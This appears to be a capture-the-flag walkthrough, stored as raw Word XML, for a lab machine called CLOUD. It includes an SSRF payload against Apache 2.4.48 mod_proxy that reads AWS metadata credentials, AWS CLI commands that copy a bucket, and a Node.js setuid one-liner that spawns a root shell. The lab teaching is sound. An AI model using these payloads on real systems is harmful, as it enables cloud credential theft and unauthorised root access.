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CLOUD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9pgmqj2vq5s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Nmap,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55900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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two open ports: 22 and 80. Now, we will focus our attention on the web service running on port 80.</w:t>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5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appears that we only have a default Apache page, but something notable is that the version of this Apache service is 2.4.48, as identified in the Nmap results. We can also verify this using the curl tool:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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-I &lt;url&gt;</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5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 quick internet search about this version, we found that it contains a vulnerability. Specifically, Apache version 2.4.48 is susceptible to SSRF attacks in the apache2 mod_proxy module.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more detailed information, I recommend consulting the following link:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId11">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://firzen.de/building-a-poc-for-cve-2021-40438</w:t>
        </w:r>
      </w:hyperlink>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Considering the hint in the machine name (CLOUD), it is feasible to make a call to the instance to extract specific information from AWS EC2. Under certain circumstances, it is possible to retrieve temporary credentials associated with AWS EC2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">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In this context, we need to access the metadata instance through the APIPA IP address range using the HTTP protocol —</w:t>
      </w:r>
      <w:hyperlink r:id="rId12">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId13">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://169.254.169.254/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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"http://&lt;URL&gt;/?unix:$(python3 -c 'print("A"*7701, end="")')|http://169.254.169.254/latest/meta-data/iam/security-credentials/"</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17600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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obtained the Role name ( </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">s3_read_only_cloud_machine</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ); we will resend the request, this time including the ROLE name.</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5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temporary credentials in hand, we can export them to use with aws-cli:</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export AWS_ACCESS_KEY_ID=&lt;AWS_ACCESS_KEY_ID&gt;</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export AWS_SECRET_ACCESS_KEY=&lt;AWS_SECRET_ACCESS_KEY&gt;</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export AWS_SESSION_TOKEN=&lt;AWS_SESSION_TOKEN&gt;</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aws-cli, we can list the buckets:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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498600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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list the objects inside the bucket ( machine-cloud-s3-bucket ):</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816100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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1816100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">aws s3 ls s3://machine-cloud-s3-bucket</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download these two files to our local machine:</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aws s3 cp s3://machine-cloud-s3-bucket . --recursive</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5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6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the first flag, we can authenticate via SSH using the acquired key.</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4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establishing the SSH connection, we can enumerate the server to explore possible privilege escalation paths. We begin this stage by enumerating the available capabilities ( </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">capabilities</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getcap -r / 2&gt;/dev/null</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6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Notably, Node.js is configured with specific capabilities. We can use the following site to exploit and potentially escalate our privileges:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000036">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1155cc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId22">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://gtfobins.github.io/gtfobins/node/</w:t>
        </w:r>
      </w:hyperlink>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Example:</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168400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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node -e 'process.setuid(0); require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]})'</w:t>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escalating our privileges, we can obtain the final flag located in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3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409700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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F">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o"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59" name="image2.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image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0">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-304799</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>5817870</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Cloud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-304799</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>5817870</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6686550" cy="3005191"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="46"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gtfobins.github.io/gtfobins/node/" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://firzen.de/building-a-poc-for-cve-2021-40438" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://169.254.169.254/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://169.254.169.254/" TargetMode="External"/><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O8DV3y7Lh+ccD1d7WySUeepOA==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLjlwZ21xajJ2cTVzMzIOaC4xNzVmNWNzOTR6MG84AHIhMU1ZXzZKdjdJSnFaWGZzVlNwcTF4Ul85NUpqdWlCdWRu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